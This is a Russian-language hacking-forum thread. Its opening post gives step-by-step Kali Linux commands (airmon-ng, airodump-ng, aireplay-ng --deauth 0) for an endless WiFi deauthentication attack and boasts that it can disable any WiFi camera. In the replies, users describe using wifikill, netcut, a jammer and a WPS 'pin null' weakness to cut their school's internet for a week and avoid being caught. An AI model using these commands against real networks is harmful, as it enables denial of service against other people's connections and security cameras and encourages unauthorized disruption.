Атака на WiFi с помощью Kali Linux

Joined
Jun 14, 2017
Messages
619
Reaction score
349
Приветствую, уважаемые пользователи Verminx.xyz
1.0

Это уже вторая тема на эту тематику, однозначно луцк.
Для начала запускаем сам Kali
Открываем терминал, туда прописываем это:
airmon-ng start wlan0
Этой командой вы запустите ваш адаптер как режим мониторинга. (Если у вас нет адаптера, то нужно будет купить его).

35dc6424784891987b040.png
Таким образом у нас начнется поиск WiFi сетей. Мы копируем наш BSSID и CH (канал), для сканирования данной сети. Выбирайте ту которая вам нужна.
airodump-ng --bssid XX:XX:XX:XX:XX:XX -c КАНАЛ wlan0mon
Вот так мы начнем скан нашей вайфай сети и кто к ней подключается.
Открываем новое окно терминала, и вводим данную команду:
aireplay-ng --deauth 0 -a XX:XX:XX:XX:XX:XX wlan0mon

fbbf37ab36e035c7ebfed.jpg
Таким образом мы начинаем атаку на вайфай сеть. --deauth 0 - означает бесконечная атака, до того момента пока мы не остановим процесс. -a - это мак адрес вашей WiFi сети.
И вот так, можно отключить любую камеру, которая работает по WiFI. И не только! Понимаете насколько все уязвимо?

ВНИМАНИЕ! Администрация и создатель темы не несет ответственности за ваши действия, ее несете вы и только вы!
Оригинал темы - https://graph.org/Ataka-na-WiFi-s-pomoshchyu-Kali-Linux-11-24
Мой вк - https://vk.com/undetectedButterFly
Мой дискорд - 蝶UndetectedButterFly1337.pw#0187
 
Last edited:

fr0z33n

Member
Joined
Nov 17, 2019
Messages
36
Reaction score
14
буду теперь в школе отключать камеры
VR0wc0DivIw.jpg
делаю так постоянно. просто рут на мобилу,и всякие приложения по типа wifikill,arcai's com netcut (noad).
просто имея к ней подключение.
ах да,наш информатик очень тупой,и думает что мы там какие-то ультрамегахацкеры,которые за секунды после смены узнают пароль. Хотя он сам даже не принимает к этому попытки прекратить это,а там стандартная уязвимость pin null. и говорит он директору что "дети шустрые"
лмао
 
Joined
Jun 14, 2017
Messages
619
Reaction score
349
делаю так постоянно. просто рут на мобилу,и всякие приложения по типа wifikill,arcai's com netcut (noad).
просто имея к ней подключение.
ах да,наш информатик очень тупой,и думает что мы там какие-то ультрамегахацкеры,которые за секунды после смены узнают пароль. Хотя он сам даже не принимает к этому попытки прекратить это,а там стандартная уязвимость pin null. и говорит он директору что "дети шустрые"
лмао
Помню кароч, вайфай джаммер в школу притащили, поставили деаунтификацию и клонирование, в итоге неделю инета не было(Мы остановились, но они подумали шо все плохо и стали все менять, а нас так уже 3 класса не палят за таким) XD
 

fr0z33n

Member
Joined
Nov 17, 2019
Messages
36
Reaction score
14
Помню кароч, вайфай джаммер в школу притащили, поставили деаунтификацию и клонирование, в итоге неделю инета не было(Мы остановились, но они подумали шо все плохо и стали все менять, а нас так уже 3 класса не палят за таким) XD
меня один раз спалили,и пиздец короче) сказали еще раз и пдн:BerkutSosi::CatRee:
 
Top